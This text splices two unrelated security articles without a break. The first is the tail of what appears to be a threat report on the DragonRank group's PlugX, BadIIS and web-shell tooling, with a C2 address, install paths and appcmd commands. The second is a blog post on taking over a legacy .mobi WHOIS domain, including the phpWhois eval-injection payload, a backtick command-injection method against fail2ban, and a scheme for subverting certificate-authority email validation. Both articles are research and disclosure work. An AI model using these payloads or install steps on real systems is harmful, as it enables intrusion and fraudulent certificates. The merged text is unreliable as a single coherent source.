Further, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. During this research and analysis, we discovered a similar PlugX loader that has the same system registry path, values and the same XOR algorithm with the key "0xD1" has been uploaded to VirusTotal. We used this instance of the PlugX loader that has been founded on VirusTotal, to retrieve a few original archived files and their download sites. Despite differences in the archived file's initial upload source and the countries involved, the PlugX loader and its associated payload proved to be identical, with their hashes matching precisely.
PlugX is a well-known remote access tool (RAT) equipped with modular plugins and property configurations that has been deployed by various Chinese-speaking cyber threat actors for more than ten years. The PlugX configuration in this campaign contains all the necessary values and information to properly run the executable. We extracted all the configuration field and value information from the pivot samples on VirusTotal. Below are the following fields contained in the PlugX configuration.
C2 Address: mail.tttseo[.]com:53
Persistence Type: Service + Run Key
Install Dir: %ALLUSERSPROFILE%\Adobe\Player\
Service Name: Microsoft Office Document Update Utility
Service Disp: Microsoft Office Document Update Utility
Service Desc: Microsoft Office Document Update Utility
We also discovered the same PlugX loader and payload in a file named "ddos.zip," which is disguised as a tool for managing DDoS attacks. However, all the files within this compressed archive are different variants of PlugX loader. This behavior supports our assessment that this hacking group might be new to the cybercrime industry, as they show little concern for maintaining a reputable facade. Additionally, the archive includes an application manual designed to lure users into inadvertently executing the malware, under the guise of operating a DDoS tool. The file consists of two subfolders, one masquerading as a server-side control interface and the other as a client-side installation utility. Both folders contain different versions of the PlugX loader malware but the same PlugX payload. The first variant of the PlugX loader is identical to which has been examined in this case, while the other utilizes a digitally signed driver to facilitate the execution of the PlugX payload. The operational details of this second variant about digitally signed driver PlugX are in line with the descriptions provided in this analysis. Additionally, the application's manual and the name of the folder are in Simplified Chinese, leading us to conclude that this decoy file is targeted at regions where Simplified Chinese is the spoken language.
BadIIS
To manipulate the search engine crawlers and hyperlink jump, the threat actor deployed a previously seen malware BadIIS , which was previously talked at Black Hat USA 2021. There is a medium confidence that the BadIIS observed in this campaign is associated with the entity referred to as Group 9 in the Black Hat presentation. The version of BadIIS we've detected shares similar traits with the one mentioned at the conference, including the configuration as an IIS proxy and capabilities for SEO fraud.
Group 9's IIS proxy is specifically relayed to facilitate C&C communications between infected hosts and their C&C server. Also, this malware family can SEO fraud by altering HTTP responses from the compromised IIS servers to search engine crawlers. This allows attackers to manipulate search engine rankings, artificially inflating the SEO of specific third-party websites by exploiting the credibility of the sites hosted on the breached web server. While the behavior and tactics of the BadIIS malware are largely consistent, we have noted a few distinctions that set the current variant apart, which we have identified and list down here.
Group 9
DragonRank
Crawlers pattern
Target China search engines, e.g.:sogou, baidu, 360, etc.
Target well-known search engines, e.g.: google, yahoo, bingbot, etc.
After analyzing other available samples with an execution sequence in this campaign, filenames identical to the malicious activity we observed and possibly related to the attack we observed from another campaign. We have uncovered several important discoveries through our research, and these will be detailed sequentially in this section.
Our initial observation reveals that the DragonRank hacking group tends to install the BadIIS malware in certain file locations. For instance, they attempt to place BadIIS within directories named "Kaspersky SDK," likely as a tactic to evade detection by security software. The file paths we observed are as follows:
C:/ProgramData/Kaspersky SDK/IISMODEx86.dll
C:/ProgramData/Kaspersky SDK/IISMODEx64.dll
C:/ProgramData/IISMODEx64.dll
C:/ProgramData/IISMODEx86.dll
Additionally, Talos has observed that the BadIIS malware samples contain Program Database (PDB) strings as well as timestamps indicating when they were compiled. The BadIIS malware variants were compiled between April and August 2023. The PDB strings to these samples were found listed below:
Based on our analysis of these matching samples and telemetry from our secure agent, the execution sequence has two parts:
Execute “1.bat” a batch file to install BadIIS
The discovery of the "1.bat" script file guided us to a blog post that revealed the source code for the BadIIS malware. This post not only shared the source code and objectives of BadIIS but also included a well-organized batch script, enabling users to easily install the BadIIS on IIS servers. The main purpose of this batch script is to configure the IIS module to install the malicious BadIIS payload. It leverages the appcmd.exe utility to modify the IIS configuration and copy BadIIS module files within the "%windir%\Microsoft.NET\Framework64" directory. Upon completion of these modifications, it proceeds to restart the IIS services to enact the changes.
Talos observed the DragonRank hacking group has added two additional commands in the install script file “1.bat”, shown on the below. Our assessment suggests that the proxy functionality of BadIIS may no longer have the capability to compress the output produced by scripts, executables, or static files such as HTML, CSS, JavaScript, and images. To successfully relay the compromised server and C&C servers’ communication, the threat actor disables the IIS dynamic and static compress function.
C:\Windows\system32\inetsrv\appcmd.exe set config /section:urlCompression /doStaticCompression:false
C:\Windows\system32\inetsrv\appcmd.exe set config /section:urlCompression /doDynamicCompression:false
In one of the compromise servers in this campaign, we also observed the DragonRank hacking group use the following command to modify the file attributes of BadIIS malware in an attempt to conceal the file and make it more difficult to detect or alter.
Upon analyzing the signature of the malware, it shares similarities with the activities described in the black hat USA 2021 talk on "Group 9." The "Group 9" malware is designed to carry out Proxy and SEO fraud, consistent with the actions detailed in the report. However, the SEO fraud and proxy function in this campaign are a little bit different from Group 9’s BadIIS variant. The SEO fraud initialization will also catch the incoming HTTP requests whose User-Agent header matches the search engine crawler, but the crawler pattern is not identical with the report, below is the BadIIS search engine crawler bot pattern that we observed in this campaign:
The proxy feature of the BadIIS malware is configured to permit access to certain URL paths or restrictions on specific file types, based on their file extensions. Once the request matches with BadIIS restrictions, the BadIIS will transfer the request to C&C server with “/zz1.php” URL path.
If a request fails to match the designated URL path or include a disallowed file extension, the proxy tool redirects the traffic to a C&C server with a different path “/xx1.php”, send the incoming request host name, URL path and its domain name to C&C server, as illustrated below. Additionally, the URI parameters in the BadIIS malware are exactly the same as the blog post source code which also provides us with further evidence that the BadIIS we found was modified from there.
We also identify that the BadIIS malware will pretend to be a Google search engine crawler in its User-Agent when it relays the connection to the C&C server. This could help the threat actor avoid network security product alerts and easily bypass some weaker security website measures.
The BadIIS malware we already confirm affects neither the compromised server nor the server’s users. However, it poses a threat to users of third-party websites by acting as a conduit for phishing attacks. BadIIS leverages an Internet Server Application Programming Interface (ISAPI) DLL to take control of all HTTP requests sent to the hosted websites and to modify the server's HTTP responses strategically. The malware engages in SEO deception on the infected IIS servers to boost the visibility of a third-party fraudulent website, specifically targeting and influencing the behavior of certain search engine crawlers as detailed in the blog post. Below is the network request flow of the BadIIS operating mechanism in this campaign.
Assembly web shell
We performed a pivot analysis of the C&C IP associated with PrintNotifyPotato using VirusTotal and other malware cloud repositories. Through this analysis, we discovered four distinct versions of ASP.NET compiled DLLs that embedded Metasploit and tried to connect the same C&C we found. These DLL files typically appear when ASP.NET compiles .aspx files into assemblies, a process that occurs upon the first access to the .aspx file, with ASP.NET saving the resulting assemblies in a temporary directory.
The DLL web shell has several functions embedded, Metasploit reverse shell, Godzilla web shell and ASPXSpy web shell. Below we list down the web shell file path and its compare functions.
Although the ASPXSpy web shell function is open source on GitHub, the specific version of ASPXSpy we identified matches exactly with the one used in this campaign.
ASPXSpy web shell in this campaign (left) and web shell in compiled DLLs (right).
Coverage
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SID for this threat is – 63953 and 63954.
ClamAV detections are also available for this threat:
Win.Trojan.Explosive-ASP-6510859-0
Asp.Trojan.Webshell-6993264-0
Win.Tool.GodPotato-10019688-1
Win.Malware.Mimikatz-10034728-0
Win.Tool.PrintNotifyPotato-10034729-0
Win.Tool.UserClone-10034730-0
Win.Malware.BadIIS-10034755-0
Win.Trojan.PlugX_Payload-10034756-0
Win.Trojan.PlugXLoader-10034757-0
Win.Trojan.PlugXKernelDriver-10034758-0
Win.Trojan.Mimikatz-6466236-2
Win.Tool.BadPotato-9819486-2
Indicator of compromise
Indicators of Compromise associated with this threat can be found here.
Welcome back to another watchTowr Labs blog. Brace yourselves, this is one of our most astounding discoveries.
Summary
What started out as a bit of fun between colleagues while avoiding the Vegas heat and $20 bottles of water in our Black Hat hotel rooms - has now seemingly become a major incident.
We recently performed research that started off "well-intentioned" (or as well-intentioned as we ever are) - to make vulnerabilities in WHOIS clients and how they parse responses from WHOIS servers exploitable in the real world (i.e. without needing to MITM etc).
As part of our research, we discovered that a few years ago the WHOIS server for the .MOBI TLD migrated from whois.dotmobiregistry.net to whois.nic.mobi – and the dotmobiregistry.net domain had been left to expire seemingly in December 2023.
Putting thoughts aside, and actions first, we punched credit card details as quickly as possible into our domain registrar to acquire dotmobiregistry.net - representing much better value than the similarly priced bottle of water that sat next to us.
Our view was that as a legacy WHOIS server domain, it was likely only used by old WHOIS tools (such as phpWHOIS, which conveniently has an Remote Code Execution (RCE) CVE from 2015 for the parsing of WHOIS server responses – thus fitting our aim quite nicely).
Throwing caution into the wind and following what we internally affectionately refer to as our 'ill-advised sense of adventure' - on Friday 30th August 2024 we deployed a WHOIS server behind the whois.dotmobiregistry.net hostname, just to see if anything would actually speak to it actively.
The results have been fairly stunning since - we have identified 135000+ unique systems speaking to us, and as of 4th September 2024 we had 2.5 million queries. A brief analysis of the results showed queries from (but certainly not limited to):
Various mail servers for .GOV and .MIL entities using this WHOIS server to presumably query for domains they are receiving email from,
Various cyber security tools and companies still using this WHOIS server as authoritative (VirusTotal, URLSCAN, Group-IB as examples)
However, significant concern appeared on 1st September 2024 when we realised that numerous Certificate Authorities responsible for issuing TLS/SSL certificates for domains like 'google.mobi' and 'microsoft.mobi', via the 'Domain Email Validation' mechanism for verifying ownership of a domain, were using our WHOIS server to determine the owners of a domain and where verification details should be sent.
We PoC'd this with GlobalSign and were able to demonstrate that for 'microsoft.mobi', GlobalSign would parse responses provided by our WHOIS server and present '[email protected]' as an authoritative email address.
Effectively, we had inadvertently undermined the CA process for the entire .mobi TLD.
As is common knowledge, this is an incredibly important process that underscores the security and integrity of communications that a significant amount of the Internet relies upon. This process has been targeted numerous times before by well-resourced nation-states:
While this has been interesting to document and research, we are a little exasperated. Something-something-hopefully-an-LLM-will-solve-all-of-these-problems-something-something.
As always, we remind everyone - if we could do this, anyone can.
Onto the full story...
Setting The Scene
We're sure you’re familiar with the old adage, ‘it never rains but it pours’. That was definitely the case here, where we set out with the intention of just getting some RCE’s to fling around, and ended up watching the foundation of secure Internet communication crumble before our eyes.
Before we get ahead of ourselves, though, let’s start at the beginning, in which we decided to take a quick look at a WHOIS client. The protocol being some 50+ years old, we expected WHOIS clients to be constructed with the same brand of string as an enterprise-grade SSL VPN appliance, and so we took a naive shot and served up some A’s.
This, at first glance, looks like an easily-exploitable crash. We were keen to find more bugs, and keenly started examining some other client implementations - but we were soon interrupted by some vocal killjoys naysayers.
They were quick to remind us that, to get to this state in our lab environment, we’d impersonated a WHOIS server, redirecting traffic from the usual server to our test server via iptables.
How realistic was this attack scenario, the naysayers asked?
We tried to silence the killjoy's naysayers and convince them our attack was plausible - we could find a registrar that allows us to set a Referral WHOIS value, or buy an IP range and control the range ourselves - but they suggested we spend more time doing, and less time playing academia.
The reality was that in order for an attacker to carry out an attack against a WHOIS client, they’d need one of the following:
A Man-In-The-Middle (MiTM) attack, which requires the ability to hijack WHOIS traffic at the network layer - out of reach for all but the most advanced of APTs,
Access to the WHOIS servers themselves, which is plausible but unlikely, or
A WHOIS referral to a server they control.
These are effectively the preconditions of a nation-state or someone who is very comfortable compromising global TLD WHOIS servers in pursuit of exploiting clients.
You would, at this point, be forgiven for thinking that this class of attack - controlling WHOIS server responses to exploit parsing implementations within WHOIS clients - isn’t a tangible threat in the real world.
We were left unsatisfied. We had located some shoddy code, but declaring it out of reach sounded like something you might bill a day rate for.
Perhaps there was another avenue for attack?
Collateral Damage In Pursuit Of RCE
The key to turning this theoretical RCE into a tangible reality is rooted in the tangled mess of the WHOIS system.
One of the biggest ‘kludges’ in the WHOIS system is the means of locating the authoritative WHOIS server for a given TLD in the first place.
Each TLD (the bit at the end of the domain), you see, has a separate WHOIS server, and there’s no real standard to locating them - the only ‘real’ method being examining a textual list published by IANA. This list denotes the hostname of a server for each TLD, which is where WHOIS queries should be directed.
As you can imagine, maintainers of WHOIS tooling are reluctant to scrape such a textual list at runtime, and so it has become the norm to simply hardcode server addresses, populating them at development time by referring to IANA’s list manually. Since the WHOIS server addresses change so infrequently, this is usually an acceptable solution.
However, it falls down in an ungraceful manner when server addresses change. With a little bit of legwork, we found that the WHOIS server for a particular TLD - .mobi - had been changed some years ago from the old domain whois.dotmobiregistry.net to a new server, at whois.nic.mobi.
Of course though, because the Internet is joined together by literal string and hopes/wishes at this stage, somebody had neglected to renew the old domain at dotmobiregistry.net meaning it was up for grabs by anyone with $20 and an ill-advised sense of exploration.
We registered the domain, working on the theory that, while most client tooling would be updated to use whois.nic.mobi, most of the Internet population is still surprised when their 2011 SAP deployment gets popped, and thus WHOIS applications in production had a fairly decent chance of still referencing whois.dotmobiregistry.net.
Of course, this being the Internet, we got a little more than we bargained for.
So What? It's Old
We soon realized the threat model for this attack had just changed.
Now that we control a WHOIS server, we were in the position to ‘respond’ to traffic sent by anyone who hadn’t updated their client to use the new address (auto updates are bad, turn them off).
No longer do we require a Man-In-The-Middle attack, or some exotic WHOIS referral, to exploit a WHOIS client vulnerability - all we need to do is wait for queries to come in, and theoretically respond with whatever we want.
The pre-requisites for real-world exploitation now sat within what we deemed ‘rough reality’.
Things were beginning to escalate.
We had set out to find some simple bugs in WHOIS client tooling, file for some CVEs, get them fixed.. but then we realised that once again we’d probably chewed off more than we intended and things were about to become worse - much worse.
Never Update, Auto-Updates And Change Are Bad
Unfortunately, there is a lot of Internet infrastructure which depends on the antiquated WHOIS protocol.
Starting off slow, we’re now in a position to attack the many websites that run a WHOIS client and echo the results back to the user, injecting XSS or PHP eval payloads. Ethical (and legal) concerns prevent us from doing so, however - and we did not spend $20 to get an XSS.
Of course, our original goal was to find and exploit some 0day in WHOIS clients, or some other system that embeds a WHOIS client (such as a spam filter), similar to the trivial memory corruption we found earlier.
Our biggest hurdle here - as alluded to above - was the simplicity of the WHOIS protocol itself, which is a simple text-based TCP data stream. With so little complexity, there seemed very little room for developers to make errors.
Ha.
Prior Art
To fully understand and look to leverage our new capability and adjusted threat model, we decided to examine the area’s ‘prior art’ in exploitation, looking at historic attacks on WHOIS clients.
We were somewhat surprised that a search for relevant CVE data yielded relatively few results, which we attributed to the area being under-researched - the search return 26 CVE records.
Once we discount the irrelevant results, we are left with only three bugs that are triggered by malformed WHOIS responses.
This small number - three bugs since 1999 - makes it obvious to us that very little research has been done - likely due to the perception that any real-world exploitation comes with difficult prerequisites, such as control of a TLD WHOIS server.
But, there have been some interesting cases - just to give you a taste of where this is going.
phpWHOIS (CVE-2015-5243)
The first bug that our retrospective found was CVE-2015-5243. This is a monster of a bug, in which the prolific phpWhois library simply executes data obtained from the WHOIS server via the PHP ‘eval’ function, allowing instant RCE from any malicious WHOIS server.
The important item is the juicy eval statement in the middle of the snippet, which is fed data returned from the WHOIS server.
While it attempts to escape this data before it evaluates it, it does so imperfectly, only replacing " with the escaped form, \\\\" . Because of this, we can sneak in our own PHP code, which is then executed for us.
Netitude’s blogpost lays out all the details, and even provides us with exploitation code - ”;phpinfo();// - is enough to spawn a phpinfo page.
We tried this out on an application that uses phpWhois, purely to demonstrate, and it worked swimmingly:
Clearly this is a powerful bug - the best part being that phpWhois hardcodes our newly found whois.dotmobiregistry.net in vulnerable versions (it's old, but at a cursory glance no-one appears to have ever updated phpWhois).
What other historic artefacts could we find, though?
Fail2Ban (CVE-2021-32749)
As we continued to examine historic client-side bugs, we came across CVE-2021-32749. This one is again a pretty nasty bug, this time in the ever-popular fail2ban package. It’s a command injection vulnerability, a vulnerability class keenly sought by attackers due to its power and ease of exploitation.
As you may know, if you have administered a fail2ban server, the purpose of fail2ban is to monitor failed login attempts, and prevent bruteforce or password-guessing attacks by blocking hosts which repeatedly fail to log in.
Being the polished package it is, it also includes the ability to email an administrator when an IP address is banned, and - very helpfully - when it does so, it will enrich the email with information about who owns the banned IP address.
This information is gleaned from - yeah, you guessed it! - our friend WHOIS.
Unfortunately, for some time, the output of the WHOIS client wasn’t correctly sanitized before being passed to the mail tool, and so a command injection bug was possible.
Fortunately - or unfortunately, if you’re an attacker - because fail2ban runs a WHOIS query on the IP address rather than, for example, a domain name specified in the PTR record of an IP address of blocked hosts - this attack is not within reach still based on our newly found capability.
For those that control a WHOIS server that is queried for IP addresses, though, exploitation is simple - simply attempt to unsuccessfully authenticate to a server via SSH a few times to trigger a ban, and once fail2ban queries the WHOIS server for information on your IP address - serve a payload wrapped in backticks.
Reality check
So, the burning question on our minds - can we actually exploit these bugs, right now?
Well, at this stage, our view was fairly pessimistic in terms of achieving real-world impact. We saw the following pre-requisites:
The WHOIS client must be querying an old authoritative .MOBI WHOIS server and thus by definition, has not been working for quite a while
To achieve client-side code execution (i.e. compromise) via a WHOIS client vuln - the only public option available to us was disclosed in 2015 and appears to have been rectified in 2018 - likely due to the perceived lack of real-world exploitation mechanisms.
Meh. Our gut feeling remained that most of the Internet and those in the sane world would logically be querying the new .mobi authoritative WHOIS server whois.nic.mobi, rather than the decommissioned dotmobiregistry.net (which we now controlled).
“Surely no large organisations would still reference the old domain”, we thought to ourselves.
Kill WHOIS With Fire
Without skipping a beat and really not considering the consequences, we set up a WHOIS server beneath our new domain at whois.dotmobiregistry.net, and logged incoming requests. We specifically focused on two things:
Source IPs (so we can perhaps begin to work out who exactly was querying an outdated server), and,
The queried domain (because again, this may give off some clues).
We threw together the lglass server to respond to WHOIS requests that found their way to our WHOIS server, and returned:
ASCII art (we were relatively refrained here, but it was a priority)
Fake WHOIS details indicating watchTowr as the owner for every queried entity.
As this was our private server, we included a request for queries to cease (after all, they were unauthorised).
A quick test directly to our new WHOIS server showed that all was working as expected, with the following response provided for a query about google.mobi:
Nice.
Uh…..
Well, it’s 2024 - absolutely no one has the ability to exercise patience, including ourselves.
So, we began just looking around the Internet for obvious locations that could be sending queries our way. Surely, we thought - surely! - the broken clients using an outdated server address wouldn’t be in anything major, that we use every day?
A significant number of domain registrars and WHOIS-function websites
A screenshot of each WHOIS tool would become repetitive, but you get the idea.
urlscan.io - “A sandbox for the web” - used our WHOIS server for .mobi, too. You can see the results by browsing to a page representing any .mobi domain (like this one).
VirusTotal, the popular malware-analysis site, was querying us! A tool dedicated to the analysis of hostile code seemed like an opportunity for enjoyment.
Sadly, VirusTotal doesn't render our ASCII art properly, but as you can see - VirusTotal is querying our makeshift WHOIS server for this global .TLD and presenting back the results. We were also pleased to see that VirusTotal updated their records of who owns bbc.mobi:
For anyone that has ever worked in offensive security, you occasionally get a sinking feeling where you realize something may be a little larger than expected, and you begin to wonder.. “what have we broken?”.
(Editors note: Technically, this should be ‘what was broken’, because people were querying our WHOIS server without authorisation and we’re very upset - get off our lawn!).
Well, with our WHOIS server clearly working - we figured we’d come back in a few days and see if anything at all reached out to us - giving us a good excuse to stare at a separate PSIRT response indicating a 2 year lead time to resolve a vulnerability.
Being insatiable and generally finding it hard to focus on anything longer than a TikTok video of a dog in a hat, we took a look to see how many unique IPs had queried our new WHOIS server after a few hours:
$ sqlite3 whois-log-copy.db "select source from queries"|sort|uniq|wc -l
76085
Uh. Yes, that’s correct - this is 76,000+ unique source IP addresses that have sent queries to our WHOIS server in just a couple of hours.
We were somewhat dismayed when, after leaving our server running for around two days, the poor little SQLite DB containing the logs ballooned to some 1.3 million queries! Clearly, we’d stumbled into something more major than we’d anticipated.
We threw the list of IPs at ZDNS and just sat back, as a relatively feeble way of doing attribution:
Some other highlights of source hosts (not exhaustive, but just to give you some idea of just how bad this trash fire appeared to be):
Mail servers! Lots and lots of mail servers.
Spam filters will often do WHOIS lookups on sender domains. We saw a bunch of these, ranging from the aptly-named cheapsender.email through to mail.bdcustoms.gov.bd - which appears to be part of the Bangladeshi government's infrastructure. Yikes! Theoretically, we could cause mayhem by serving responses indicating that the sending domain was a known spammer - and even more mayhem-worthy to start fuzzing the WHOIS parsing code to pop RCE on the mail servers themselves.
(We didn’t)
Leading on from that thought, what other .gov apparatus have we been queried by? Well, we found Brazil in our logs multiple times - for example, antispam.ap.gov.br and master.aneel.gov.br , and Brazil was not alone. We also found .gov addresses belonging to (but again not limited to):
Argentina,
Pakistan,
India,
Bangladesh,
Indonesia,
Bhutan,
Philippines,
Israel,
Ethiopia,
Ukraine,
USA.
Neat.
Militaries (.mil)
Swedish Armed Forces, for example
Universities (.edu)
All of them
We even saw cyber security companies - hey Group-IB, Detectify! - query our WHOIS server (presumably doing threat intel things for .mobi domains).
We saw Censys query us for ‘google.com’ and wondered if we’d get an APT number and a threat intel report shout-out if we’d been actively delivering payloads. Maybe we did? Check your boxen. (We didn't. Or did we?)
We’re still trying to determine what software solutions are in play here/configured to query this WHOIS server for .mobi - let us know if you have any ideas.
Those who are nefariously minded likely realised what we saw as well - with .gov and other mail servers querying us each time they received an email from a .mobi domain - we could begin to passively determine who may be in communication.
This is not ideal. How do we fix this? Well, hold that thought - IT GETS WORSE.
Tales of TLS
TLS/SSL. Everyone knows it - it’s that friendly little padlock icon in the address bar that assures you that your connection is secure. It’s powered by the concept of certificates - sometimes used for HTTPS, sometimes used for signing your malware.
For example, say you’re the owner of watchTowr.mobi. You want to secure communications to your web server by speaking TLS/SSL , so you go off to your favourite Certificate Authority and request a certificate (let’s also pretend you haven’t heard of LetsEncrypt).
The Certificate Authority will verify that you own the domain in question - watchTowr.mobi - and will then sign a private certificate, attesting to your identity as the owner of that domain. This is then used by the browser to ensure your communications are secure.
Anyway, what does this have to do with WHOIS, and what does it have to do with us?!
Well, it turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain - say watchTowr.mobi- and pulling out email addresses defined as the ‘administrative contact’.
The process is to then send that email address a verification link - once clicked, the Certificate Authority is convinced that you control the domain that you are requesting a TLS/SSL cert for and they will happily mint you a certificate.
For example:
Perhaps you can see where we’re going with this? sobs
If a TLS/SSL certificate authority is using our WHOIS server for .mobi domains, we can likely provide our own email address for this “Email Domain Control Validation” method.
Uh-oh. Is this a fringe feature supported only by two-bit, poor-quality certificate authorities?
No! Here’s a sample of large TLS/SSL Certificate Authorities/resellers that support WHOIS-based ownership verification:
Trustico
Comodo
SSLS
GoGetSSL
GlobalSign
DigiSign
Sectigo
Going through the normal order flow, we began cautiously - by generating a CSR (Certificate Signing Request) for the fictitious domain watchTowr.mobi - the logic being that as long as our WHOIS server was queried, whether or not the domain was real was irrelevant because we respond positively to absolutely every request including domains that don’t actually exist.
# sudo openssl req -new -key custom.key -out csr.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:SG
State or Province Name (full name) [Some-State]:Singapore
Locality Name (eg, city) []:Singapore
Organization Name (eg, company) [Internet Widgits Pty Ltd]:watchTowr
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:watchtowr.mobi
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
We’re not going to walk through each provider - for the purposes of illustration, we’ll use GoGetSSL.
Once we upload our watchTowr.mobi CSR to GoGetSSL, it is parsed, and we continue. The indication of these placeholder email addresses indicates that WHOIS was not successful - instead of the email address that our WHOIS server is configured to respond with ([email protected]), we’re presented with only @watchtowr.mobi domains.
That’s something of a relief.
The Certificate Authority has correctly determined that the domain watchTowr.mobi does not exist and thus if WHOIS is working as expected, no email addresses will be returned. We concluded that our newly set up WHOIS server was not being queried by the provider.
At least the world isn’t ending. Right? (spoiler: it actually was)
We carried on trying a few other providers until a thought occurred.
The WHOIS protocol is extremely simple. Essentially it is a string blob returned in various formats depending on the TLD serving it. Each provider implements parsing in their own way. Perhaps, before we write off our theory, we should make sure this verification mechanism is actually working as it is supposed to.
So, we began again - choosing microsoft.mobi as a .mobi domain that appeared to follow a fairly typical WHOIS format (when using the current .mobi WHOIS server).
The screenshot below shows that the legitimate WHOIS record for microsoft.mobi was correctly parsed at Entrust, as the only email addresses available for validation were at the microsoft.com domain:
While the WHOIS record for watchTowr.mobi was not being parsed at all (indicating that Entrust was using the correct WHOIS server, and not ours):
Looks good you think?
WRONG.
We skipped and hopped over to the next provider, GlobalSign. GlobalSign reported that they were unable to parse the WHOIS record of microsoft.mobi:
At this point, something clicked in our minds. Perhaps GlobalSign WAS querying our new WHOIS server - but the string returned by our WHOIS server was incompatible with GlobalSign’s parsing?
We copied the microsoft.mobi output from the legitimate WHOIS server, made it our own, and loaded it into our own WHOIS server - updated to look like the following:
Holding our breath, we then re-triggered GlobalSign with a CSR for microsoft.mobi…
We want to be explicitly clear that we stopped at this point and did not issue any rogue TLS/SSL certificates to ourselves. This would undoubtedly create an incident, and require significant amounts of work by many parties to revoke and roll back this action.
Success!
The GlobalSign TLS/SSL certificate WHOIS domain verification system had queried our WHOIS server, parsed [email protected] from the result, and presented it as a valid email address to send a verification email to, allowing us to complete verification and obtain a valid TLS/SSL certificate.
This is then blindingly simple:
Set up a rogue WHOIS server on our previously authoritative hostname, responding with our own email address as an ‘administrative contact’
Attempt to purchase a TLS/SSL certificate for a .mobi domain we want to target (say, microsoft.mobi)
A Certificate Authority will then perform a WHOIS lookup, and email us instead of the real domain owners [theory]
We click the link, and.. [theory]
… receive an TLS/SSL cert for the target domain! [theory]
Now that we have the ability to issue a TLS/SSL cert for a .mobi domain, we can, in theory, do all sorts of horrible things - ranging from intercepting traffic to impersonating the target server. It’s game over for all sorts of threat models at this point.
While we are sure some may say we didn’t ‘prove’ we could obtain the certificate, we feel this would’ve been a step too far — so whatever.
One Last Thing
Please stop emailing us..
Here We Go Again..
We hope you’ve enjoyed (and/or been terrified by) today’s post, in which we took control of a chunk of the Internet’s infrastructure, opened up a big slab of juicy attack surface, and found a neat way of undermining TLS/SSL - the fundamental protocol that allows for secure communication on the web.
We want to thank the UK's NCSC and the ShadowServer Foundation for rapidly working with us ahead of the release of this research to ensure that the 'dotmobiregistry.net' domain is suitably handled going forwards, and that a process is put in place to notify affected parties.
The dotmobiregistry.net domain, and whois.dotmobiregisry.net hostname, has been pointed to sinkhole systems provided by ShadowServer that now proxy the legitimate WHOIS response for .mobi domains.
We released this blog post to initially share our process around making the unexploitable exploitable and highlight the state of legacy infrastructure and increasing problems associated with abandoned domains - but inadvertently, we have shone a spotlight on the continuing trivial loopholes in one of the Internet’s most vital encryption processes and structures - TLS/SSL Certificate Authorities. Our research has demonstrated that trust placed in this process by governments and authorities worldwide should be considered misplaced at this stage, in our opinion.
We continue to hold concern around the basic reality - we found this on a whim in a hotel room while escaping the Vegas heat surrounding Black Hat, while well-resourced and focused nation-states look for loopholes like this every day. In our opinion, we are not likely to be the last to find inexcusable flaws in such a crucial process.
Although subverting the CA verification process was by far the most devastating of impacts that we uncovered, it was by no means the limit of the opportunity available to us as we also found everything from memory corruptions to command injections. Our ‘honeypot’ WHOIS server gave us some interesting statistics, revealing just how serious the issue is, and a large amount of Internet infrastructure continues to query us instead of the legitimate WHOIS servers.
We do not intend to call out any specific organization or maintainer here - the prevalence of this issue and the statistics on hand show that this is not a pure-negligence or competence related issue - but a fundamental flaw in how these processes work together.
It’s worth noting that all the above attacks that we were able to orchestrate given our takeover are also possible by any entity that is able to carry out MITM attacks - such as entities that control or can influence transit backbones. It would be very easy for an attacker with such access to fake WHOIS data for any domain, and thus obtain valid TLS/SSL certificates. Of course, there has been an insurmountable level of effort by major players to add transparency to this process over the years, and thus, 'pulling off' a heist of this scale has its operational hurdles.
At watchTowr, we passionately believe that continuous security testing is the future and that rapid reaction to emerging threats single-handedly prevents inevitable breaches.
With the watchTowr Platform, we deliver this capability to our clients every single day - it is our job to understand how emerging threats, vulnerabilities, and TTPs could impact their organizations, with precision.
If you'd like to learn more about thewatchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.